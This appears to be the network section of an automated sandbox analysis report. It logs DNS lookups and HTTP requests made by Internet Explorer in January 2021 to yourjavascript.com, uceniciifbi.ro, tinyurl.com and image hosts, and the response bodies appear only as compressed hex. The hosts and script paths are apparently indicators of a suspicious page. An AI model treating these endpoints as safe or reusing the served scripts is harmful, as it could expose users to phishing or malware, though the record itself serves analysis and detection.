Jan 13, 2021 18:15:26.774117947 CET	53	58987	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:28.035852909 CET	56579	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:28.084131002 CET	53	56579	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:29.519335032 CET	60633	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:29.575939894 CET	53	60633	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:30.516180992 CET	61292	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:30.564308882 CET	53	61292	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:30.702996969 CET	63619	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:30.751710892 CET	53	63619	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:31.475070000 CET	64938	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:31.523212910 CET	53	64938	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:32.019004107 CET	61946	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:32.252198935 CET	53	61946	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:34.945513010 CET	64910	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:35.002244949 CET	53	64910	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:35.502044916 CET	52123	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:35.552717924 CET	53	52123	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:35.952253103 CET	64910	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:36.008697033 CET	53	64910	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:36.513838053 CET	52123	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:36.564723015 CET	53	52123	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:36.968367100 CET	64910	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:37.016164064 CET	53	64910	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:37.599323988 CET	52123	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:37.649962902 CET	53	52123	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:38.984962940 CET	64910	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:39.033020973 CET	53	64910	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:39.607125044 CET	52123	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:39.657932043 CET	53	52123	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:42.998599052 CET	64910	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:43.055013895 CET	53	64910	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:43.623281002 CET	52123	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:43.674643040 CET	53	52123	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:45.584526062 CET	56130	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:45.645529985 CET	53	56130	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:48.700310946 CET	56338	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:48.748198986 CET	53	56338	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:49.932435989 CET	59420	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:49.980366945 CET	53	59420	8.8.8.8	192.168.2.3
Jan 13, 2021 18:15:54.406723976 CET	58784	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:15:54.463382006 CET	53	58784	8.8.8.8	192.168.2.3
Jan 13, 2021 18:16:03.794908047 CET	63978	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:16:03.866316080 CET	53	63978	8.8.8.8	192.168.2.3
Jan 13, 2021 18:16:05.850136042 CET	62938	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:16:05.919756889 CET	53	62938	8.8.8.8	192.168.2.3
Jan 13, 2021 18:16:33.019675016 CET	55708	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:16:33.067830086 CET	53	55708	8.8.8.8	192.168.2.3
Jan 13, 2021 18:16:33.499105930 CET	56803	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:16:33.570760965 CET	53	56803	8.8.8.8	192.168.2.3
Jan 13, 2021 18:16:53.864592075 CET	57145	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:16:53.912688971 CET	53	57145	8.8.8.8	192.168.2.3
Jan 13, 2021 18:17:49.576458931 CET	55359	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:17:49.664386034 CET	53	55359	8.8.8.8	192.168.2.3
Jan 13, 2021 18:17:50.216890097 CET	58306	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:17:50.275676966 CET	53	58306	8.8.8.8	192.168.2.3
Jan 13, 2021 18:17:50.939297915 CET	64124	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:17:51.022708893 CET	53	64124	8.8.8.8	192.168.2.3
Jan 13, 2021 18:17:51.499864101 CET	49361	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:17:51.556246996 CET	53	49361	8.8.8.8	192.168.2.3
Jan 13, 2021 18:17:52.055874109 CET	63150	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:17:52.169749975 CET	53	63150	8.8.8.8	192.168.2.3
Jan 13, 2021 18:17:53.306227922 CET	53279	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:17:53.365909100 CET	53	53279	8.8.8.8	192.168.2.3
Jan 13, 2021 18:17:54.514880896 CET	56881	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:17:54.563021898 CET	53	56881	8.8.8.8	192.168.2.3
Jan 13, 2021 18:17:56.181525946 CET	53642	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:17:56.238538027 CET	53	53642	8.8.8.8	192.168.2.3
Jan 13, 2021 18:17:57.185385942 CET	55667	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:17:57.244750977 CET	53	55667	8.8.8.8	192.168.2.3
Jan 13, 2021 18:17:57.748253107 CET	54833	53	192.168.2.3	8.8.8.8
Jan 13, 2021 18:17:57.804625988 CET	53	54833	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2021 18:15:06.112787962 CET	192.168.2.3	8.8.8.8	0x67c4	Standard query (0)	yourjavascript.com	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:06.318650007 CET	192.168.2.3	8.8.8.8	0xff64	Standard query (0)	tinyurl.com	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.120925903 CET	192.168.2.3	8.8.8.8	0x242b	Standard query (0)	uceniciifbi.ro	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.569763899 CET	192.168.2.3	8.8.8.8	0xef80	Standard query (0)	maxcdn.bootstrapcdn.com	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.572455883 CET	192.168.2.3	8.8.8.8	0x8c9d	Standard query (0)	i.postimg.cc	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.599348068 CET	192.168.2.3	8.8.8.8	0x410d	Standard query (0)	svgur.com	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.613245010 CET	192.168.2.3	8.8.8.8	0x577d	Standard query (0)	cdnjs.cloudflare.com	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.632033110 CET	192.168.2.3	8.8.8.8	0xa01d	Standard query (0)	i.ibb.co	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:08.676229954 CET	192.168.2.3	8.8.8.8	0x2763	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:22.511854887 CET	192.168.2.3	8.8.8.8	0x314e	Standard query (0)	www.iconj.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2021 18:15:06.185707092 CET	8.8.8.8	192.168.2.3	0x67c4	No error (0)	yourjavascript.com		5.189.183.184	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:06.374808073 CET	8.8.8.8	192.168.2.3	0xff64	No error (0)	tinyurl.com		104.20.138.65	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:06.374808073 CET	8.8.8.8	192.168.2.3	0xff64	No error (0)	tinyurl.com		104.20.139.65	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:06.374808073 CET	8.8.8.8	192.168.2.3	0xff64	No error (0)	tinyurl.com		172.67.1.225	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.215490103 CET	8.8.8.8	192.168.2.3	0x242b	No error (0)	uceniciifbi.ro		91.207.103.145	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.617811918 CET	8.8.8.8	192.168.2.3	0xef80	No error (0)	maxcdn.bootstrapcdn.com	cds.j3z9t3p6.hwcdn.net		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 18:15:07.661410093 CET	8.8.8.8	192.168.2.3	0x577d	No error (0)	cdnjs.cloudflare.com		104.16.19.94	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.661410093 CET	8.8.8.8	192.168.2.3	0x577d	No error (0)	cdnjs.cloudflare.com		104.16.18.94	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.718322039 CET	8.8.8.8	192.168.2.3	0x8c9d	No error (0)	i.postimg.cc		51.91.224.95	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.718322039 CET	8.8.8.8	192.168.2.3	0x8c9d	No error (0)	i.postimg.cc		5.135.83.165	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.745613098 CET	8.8.8.8	192.168.2.3	0x410d	No error (0)	svgur.com		216.239.38.21	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.745613098 CET	8.8.8.8	192.168.2.3	0x410d	No error (0)	svgur.com		216.239.36.21	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.745613098 CET	8.8.8.8	192.168.2.3	0x410d	No error (0)	svgur.com		216.239.32.21	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.745613098 CET	8.8.8.8	192.168.2.3	0x410d	No error (0)	svgur.com		216.239.34.21	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.782058954 CET	8.8.8.8	192.168.2.3	0xa01d	No error (0)	i.ibb.co		145.239.131.51	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.782058954 CET	8.8.8.8	192.168.2.3	0xa01d	No error (0)	i.ibb.co		145.239.131.55	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:07.782058954 CET	8.8.8.8	192.168.2.3	0xa01d	No error (0)	i.ibb.co		145.239.131.60	A (IP address)	IN (0x0001)
Jan 13, 2021 18:15:08.724147081 CET	8.8.8.8	192.168.2.3	0x2763	No error (0)	code.jquery.com	cds.s5x3j6q5.hwcdn.net		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 18:15:22.568409920 CET	8.8.8.8	192.168.2.3	0x314e	Server failure (2)	www.iconj.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

yourjavascript.com

i.postimg.cc

svgur.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49721	5.189.183.184	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 18:15:06.244250059 CET	64	OUT	GET /99821182021/5343434322.js HTTP/1.1 Accept: application/javascript, /;q=0.8 Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: yourjavascript.com Connection: Keep-Alive
Jan 13, 2021 18:15:06.292676926 CET	65	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 13 Jan 2021 17:15:06 GMT Content-Type: text/javascript; charset: UTF-8 Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip Vary: Accept-Encoding Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Cache-Control: public Data Raw: 65 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5d 50 41 0a c2 40 0c bc 17 fc 43 2f 83 ee 45 64 d3 cd 56 3c d5 56 ff a1 b6 82 07 ab d4 16 bf 6f 92 56 51 61 08 d9 64 26 99 6c 7d 3b 0d d7 a6 ed 97 cf ee d2 37 8b 74 68 9b c7 e9 70 97 6c 0e 2a c1 82 35 78 07 de c2 af c0 39 a2 07 07 30 83 2a 78 6f 95 cc b0 42 24 50 01 bf 57 48 65 14 c6 35 62 30 55 09 2f 73 08 bc 07 57 c6 91 56 0e ce 40 8c 58 20 ca 4c af 89 b4 28 07 c5 77 0c 20 e1 90 46 5f 7d b5 d8 92 51 9b 1b 2c 19 b7 44 83 38 14 db 93 e7 72 f2 ac ad 4c b7 eb 75 41 9f 72 85 12 82 d6 27 89 11 e4 28 29 4e aa cc 08 76 af 38 fc 5b a1 9e 77 f3 d4 a5 6e 93 ce 92 59 52 ff fe eb a1 bf 1d 17 9f bf ad bb ee ec 9c db 24 2f 6a 8d ea 8e 7e 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e0]PA@C/EdV<VoVQad&l};7thpl5x90xoB$PWHe5b0U/sWV@X L(w F_}Q,D8rLuAr'()Nv8[wnYR$/j~0
Jan 13, 2021 18:15:06.318594933 CET	65	OUT	GET /18210902102/7565654564.js HTTP/1.1 Accept: application/javascript, /;q=0.8 Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: yourjavascript.com Connection: Keep-Alive
Jan 13, 2021 18:15:06.367230892 CET	67	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 13 Jan 2021 17:15:06 GMT Content-Type: text/javascript; charset: UTF-8 Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip Vary: Accept-Encoding Expires: Thu, 31 Dec 2037 23:55:55 GMT Cache-Control: max-age=315360000 Cache-Control: public Data Raw: 38 33 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5b c9 8e dc 36 10 bd 1b f0 3f cc 45 b0 e7 12 48 5c 25 f8 d4 dd 92 fe c3 f1 02 e4 10 3b 48 6c e4 f7 c3 da 48 8a a2 ba 35 9e 51 07 06 0c 08 82 46 4d 16 6b af c7 a2 e6 e3 d7 0f df ff fc f4 e5 db 6f ff fe fd c7 b7 4f 6f 1f be 7f f9 f4 cf 87 f7 7f 85 a7 37 8d be 34 ae 6f 9c 6d 5c d7 38 d3 e8 a9 69 4f 70 85 f7 de 34 6e c0 fb 05 06 84 9f cc 08 6f 9c 6e bc 6a dc dc 78 0d 77 e7 60 8c 6a 1b 83 cf 70 e1 98 30 05 5e e2 83 9b 90 8e 85 89 81 b2 9a 2b c4 61 dd 01 f9 b9 20 85 a9 71 67 a0 00 6b 59 78 a9 c7 46 29 58 34 cc f2 03 4f 04 1e 88 7f 8b 6c 28 9c 82 03 7c 8b 94 69 16 ad de e3 98 19 45 c0 8b c6 07 0a bc 8a e3 f1 0e 47 c2 d5 c2 30 7d 82 59 30 71 04 45 05 3a 20 a0 01 26 55 e0 13 b5 e1 50 28 66 4f e1 b0 76 39 8c d4 35 22 9d ed 29 e1 57 ad 61 3c df fd 92 e1 eb 73 27 e4 70 48 2b 46 31 a3 65 83 bc f1 da a3 6d 50 ef 0c ef 41 87 81 9a 65 73 b3 95 67 5c 6b 87 1a a3 0e bd e7 0b 38 cc 88 b8 d3 4a 4b f2 2b eb 64 46 a7 c2 67 f2 25 e0 6d c2 bb 87 61 f0 fe bc 20 4b 8c c1 94 89 bd 1a 88 6c 38 7c a1 8a fd 5e 41 ce 0c 4e 3e a0 7e 14 90 2a 64 09 3f e9 e0 8d 81 d4 80 97 45 3b 2a e4 ad 95 6b 90 7b 8f cc 8c a5 11 ef 13 0e 51 5d f1 02 e5 90 d7 21 29 45 8e 7d 41 af c3 89 ac 1f 07 e2 3b d4 24 bb 04 59 f6 82 0f a4 70 1a 39 02 1d 43 e3 49 46 d2 21 b9 53 df a8 61 d3 69 4b 07 a6 4c e2 b6 b9 12 07 83 25 3a 31 31 9a 49 8d 98 af 2e c8 c6 00 a4 80 c8 52 8a 9b 3c ec b9 f6 f2 b9 4c 95 a6 98 d2 a1 f5 a3 59 97 a6 67 cb 7a 16 04 88 f4 e8 a2 61 75 83 57 8b 7e 1b 5e 9e c5 49 06 0c 1c 74 03 1e a9 d1 4b 65 24 bc 39 b3 e9 69 e9 a8 37 ca 39 2c 94 95 70 20 37 3e a3 b3 d1 af 12 1a 61 a1 9c 99 c8 89 6a eb 83 c1 34 4a b2 9c e1 38 0a 14 72 29 a2 75 9e 63 9a e7 9a 2c 1a 65 5c c6 c8 15 1b 6d 28 67 21 da 4b a8 e5 08 cd ec 52 cb c4 1c 02 db 11 0f 74 8b 18 87 6c d3 b2 08 50 b9 46 56 11 c3 09 14 81 d3 b5 2c 77 9c ad 4b 01 07 2c a3 7e af dd 0b 30 c3 a9 6f 28 d3 9d 97 a2 99 7c 03 49 d1 98 45 c2 c4 28 f3 12 77 29 69 f7 b8 10 02 83 c5 74 bf 8d 58 06 29 88 54 6e a6 54 52 6d df 98 13 84 bc 3d 35 be e3 3c ac 66 06 75 e1 82 55 5a 71 3c 7f cd a5 23 2e 02 6d 54 53 90 e2 aa 17 bd f4 0e a6 dc cc 72 a6 12 2f 6c 7a 54 7b 5e fe 8e 66 92 17 1a ea 17 e0 f0 76 5b ed 54 da 2e e2 27 27 81 07 86 73 08 d8 51 6a 1f 98 46 a3 ff 9c 90 02 a9 a2 5b 66 e3 4c 15 0a 03 f3 b8 4c 52 89 3b 27 85 66 44 e6 27 4c 80 63 26 2f 01 09 2f 10 97 42 a6 2b f1 c3 4e f0 c9 78 80 a2 e3 8c 0e ec 39 d2 61 ae 4d 98 81 22 b1 44 a7 14 f5 04 e1 a8 c2 52 f5 34 70 4f b8 0e e1 1c 3c f4 f2 3c 48 64 f5 c8 db cc 53 e2 5c 06 8a 0e c1 ff 08 77 98 e5 f9 25 4b 3d 32 c6 23 7c 1e 53 8d 6f 79 6b 16 e1 9f cb 20 56 81 03 21 2f 21 d4 e1 0c d6 b2 b0 0c 0b 73 73 8c 28 6f c7 0a c9 4b 0c b8 a8 96 6a 35 b1 35 eb ee ba c7 1b b3 14 b1 76 6f a5 33 b4 7c 16 3d 90 81 c4 2b a8 1a 5e a9 a1 69 00 ea 87 0a 0d 08 55 c3 fc 4a 2f 32 b3 d1 b2 4d c0 bd 06 cb d5 09 fc 26 d5 f5 90 2d 37 c1 6d 2b b8 0e 8b 88 53 52 f8 c2 44 e4 c1 2c 41 60 94 82 0a 90 f7 09 8c 29 29 a0 5c a7 22 ca a5 cd 08 ee 02 20 6f 0f 49 58 c2 f6 65 8d 5b e7 49 94 0b 92 b6 98 a3 5a b3 aa 21 e6 a2 7b 8b 1f a6 b5 28 82 b0 ca 84 82 6e 70 e3 66 87 c6 6a a8 44 Data Ascii: 831[6?EH\%;HlH5QFMkoOo74om\8iOp4nonjxw`jp0^+a qgkYxF)X4Ol(\|iEG0}Y0qE: &UP(fOv95")Wa<s'pH+F1emPAesg\k8JK+dFg%ma Kl8\|^AN>~d?E;k{Q]!)E}A;$Yp9CIF!SaiKL%:11I.R<LYgzauW~^ItKe$9i79,p 7>aj4J8r)uc,e\m(g!KRtlPFV,wK,~0o(\|IE(w)itX)TnTRm=5<fuUZq<#.mTSr/lzT{^fv[T.''sQjF[fLLR;'fD'Lc&//B+Nx9aM"DR4pO<<HdS\w%K=2#\|Soyk V!/!ss(oKj55vo3\|=+^iUJ/2M&-7m+SRD,A`))\" oIXe[IZ!{(npfjD
Jan 13, 2021 18:15:06.367430925 CET	68	IN	Data Raw: f0 4c 8e d7 65 e5 8f 66 9d 90 60 ac 41 45 f7 00 99 31 c5 ac a0 49 c5 c9 21 58 8a 43 1b f5 c6 3b 9d 39 c3 18 5d 56 02 c8 13 56 e5 db e6 9b 26 55 9f ab e6 45 2c d0 fb b8 81 8a 95 a5 f8 f3 d8 a4 da 63 3a 7a 06 92 f9 e1 58 86 f6 85 95 80 1a 53 7d b1 Data Ascii: Lef`AE1I!XC;9]VV&UE,c:zXS}:/.F-J?pRiPU7eNQM K\|w-8aJV4dp(/-6Q#VS pvSY\|JS+H%l)IH"Yajf}5p]Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49732	51.91.224.95	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 18:15:07.778747082 CET	111	OUT	GET /vHgYSJgT/arrow.jpg HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: i.postimg.cc Connection: Keep-Alive
Jan 13, 2021 18:15:07.835081100 CET	140	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 13 Jan 2021 17:15:07 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://i.postimg.cc/vHgYSJgT/arrow.jpg Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49733	216.239.38.21	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 18:15:07.789624929 CET	113	OUT	GET /i/G6D.svg HTTP/1.1 Accept: image/png, image/svg+xml, image/jxr, image/;q=0.8, /*;q=0.5 Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: svgur.com Connection: Keep-Alive
Jan 13, 2021 18:15:07.830990076 CET	139	IN	HTTP/1.1 200 OK Link: <https://webmention.herokuapp.com/api/webmention>; rel="webmention" ETag: sha1-0BoicgkYt4Ezi1u/kgKyQaX5nuQ= sha256-BNKSSO46E6B0UYyToY1u/Ekb8fKY+bh/yYmmrkufrXo= X-Cloud-Trace-Context: e26ffe84e2d12ae06f60b0d77789b2e8 Content-Type: image/svg+xml Content-Encoding: gzip Date: Wed, 13 Jan 2021 02:15:36 GMT Server: Google Frontend Content-Length: 1569 Age: 53971 Cache-Control: public, max-age=315360000 Data Raw: 1f 8b 08 00 00 00 00 00 02 ff b4 97 4b 6f 5b 37 10 85 ff 8a a0 6e af 68 be c9 5b d8 01 d2 95 17 f6 d6 8b ec 94 c6 8e 0c d8 4d 10 0b 76 fa ef fb 1d ce bd b2 0b b4 0d b2 28 1c 1d 28 3c e4 70 38 8f 43 ea fc e9 f9 f3 e6 fb e3 c3 1f 4f 17 db c3 f1 f8 f5 d7 b3 b3 97 97 17 f7 92 dc 97 6f 9f cf a2 f7 fe 8c 19 db cd cb fd a7 e3 e1 62 1b 7c df 6e 0e b7 f7 9f 0f c7 8b 6d cc db cd f3 fd ed cb 6f 5f be 5f 6c fd c6 6f 60 37 0c be 3b 3f de 1f 1f 6e df ed 9f 9e 6e 8f 4f e7 67 f6 bf f3 af fb e3 61 f3 e9 62 7b 9d b3 eb a9 4e d9 d5 9b d0 5d 3e ec a2 cb 37 cd 95 9e 2e 33 5f af 52 77 21 cc 93 b8 cb 54 5d 49 e1 2a 45 17 72 9c c6 a4 c3 ce f9 38 8f a5 97 71 76 f3 0d 86 0e c9 e5 54 af 52 73 69 0a 32 7f 70 be f4 ab 1c 5c c9 45 3b 7d 78 8c 53 70 3e cf fb e0 62 ed 7c 17 7a fe c2 e4 72 98 77 6e ae 8d d1 1c 30 30 d0 b8 b0 73 09 57 00 ad 17 2e e3 f8 e0 b2 86 c6 67 35 e4 e6 32 6c e7 15 07 b1 c3 60 86 1a a6 a3 a8 0c 1a 85 53 18 e9 e5 3d 83 22 16 fb b9 b9 58 a6 ea ea f0 37 c0 c4 1a 96 25 2e 7b f9 9b fb 75 9e b1 6c 81 62 81 ef e1 a6 bb e2 db e5 18 ff f0 c8 50 cd bb e0 ea 9c f7 c9 45 8e 66 a8 9d 39 38 21 2d 3b 17 b1 40 c4 c2 8a 27 b2 40 d6 54 08 f4 9e 00 d6 11 46 70 75 3b d6 ea 72 0f f8 d8 7b 5d 70 e5 4a c9 2e d4 8c dd e6 db 82 c6 11 86 d0 77 a0 ef 53 71 95 bd 0d 07 ab f3 ef 92 9b 53 64 d4 97 b2 a0 71 8c e3 91 25 b4 28 a0 b0 c2 75 65 8a da b3 b3 5b 4e 3a 8b 70 e5 7c 4d e4 ee 39 ba 98 12 87 69 35 c9 29 50 13 3c 46 49 73 25 02 c9 85 9e 17 3c 51 8a 51 68 53 c4 f3 79 41 e3 30 17 f1 8a f9 a9 19 d8 b8 eb 59 d3 73 a8 8c c6 13 0e 72 22 d2 09 32 a5 2e 5b b4 81 a1 91 58 f4 33 d5 db ae 2b 87 9b ba 4b 39 ed 99 50 a2 a6 81 9a 46 c1 12 1d aa 92 9e 18 9f 65 30 b5 e2 02 67 4c a5 b3 c6 67 38 60 18 de d1 44 99 63 10 d2 48 d0 b5 a9 70 e1 7a 89 3b 17 54 df 9d ac 18 1a 45 3e 72 77 2d 46 0e 92 e9 0f c3 d5 24 cd 30 42 60 ad 58 bd 2b b1 58 01 1e f0 22 ce cf 24 ab cc 74 62 ea ef 23 56 e4 b1 50 eb a9 9b e4 3a fe 74 a7 40 28 f8 86 0b 79 3a fe a3 2a 24 96 fc be e8 60 7c 17 2e 93 9a 6b f8 30 bb 16 f6 1c 1d 6e cd b8 4c 93 d5 9c 46 09 22 1c 64 1b b4 65 c9 d5 38 ba 96 e2 c5 34 07 37 34 56 1d 9d 86 9b da b6 89 03 07 87 c5 44 a9 63 3c 31 ec a9 06 43 23 59 d4 14 c3 1c b5 e9 9c d4 2f c2 95 ad 44 19 03 25 be 67 bc ab 2b 84 b6 a9 5a c9 d7 29 e0 da 23 85 13 29 39 df 1a 3d 5b 30 60 a8 89 7e 72 2a ac 44 95 47 fa 5c c9 14 1a 45 b6 03 b9 0b e2 12 a2 67 68 5c c0 13 f2 2f 12 37 71 df 70 b1 59 11 89 b1 2b c3 b5 a8 0b 84 83 a4 2d 7a 17 39 f2 93 ba 52 28 34 12 b3 11 25 b2 8a ce 2a 38 e0 44 75 52 4b c9 b2 15 1a 60 b8 d8 d4 00 73 d3 23 0e c7 61 1d 99 a3 24 06 3d b9 84 f2 b7 ae ee cf b1 2e 68 14 d1 25 d9 43 51 a8 46 b5 f0 1a 41 5c 29 d2 e9 58 46 71 63 de ca 5b cd 42 9f a3 81 7d 56 11 06 05 46 28 83 61 ea 34 e8 14 54 47 19 5d 28 94 96 e1 60 f1 8c Data Ascii: Ko[7nh[Mv((<p8COob\|nmo__lo`7;?nnOgab{N]>7.3_Rw!T]IEr8qvTRsi2p\E;}xSp>b\|zrwn00sW.g52l`S="X7%.{ulbPEf98!-;@'@TFpu;r{]pJ.wSqSdq%(ue[N:p\|M9i5)P<FIs%<QQhSyA0Ysr"2.[X3+K9PFe0gLg8`DcHpz;TE>rw-F$0B`X+X"$tb#VP:t@(y:$`\|.k0nLF"de8474VDc<1C#Y/D%g+Z)#)9=[0`~rDG\Egh\/7qpY+-z9R(4%8DuRK`s#a$=.h%CQFA\)XFqc[B}VF(a4TG](`
Jan 13, 2021 18:15:07.831037045 CET	139	IN	Data Raw: 66 a4 97 ab 9b 5b 5f d0 18 12 59 d5 34 79 66 d8 8f 29 c2 95 8c 95 0c a6 fe 8c 85 38 53 9b 2d a9 62 84 9a 21 e9 4d 95 4d 27 2a e5 75 24 76 34 1e ef 12 22 6b b8 4e 46 4a 69 de 18 70 93 7f cb 0a 44 87 4d 9a f4 5f f7 e1 82 63 89 ee 2c 4b 0b 9b 52 2c Data Ascii: f[_Y4yf)8S-b!MM'*u$v4"kNFJipDM_c,KR,FX7NBjrK5ll+ky)B:B@=70\r<.\|;po;(Asp#n3k4J{\\\\|cT'P.NVV)Xc+IeGg

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
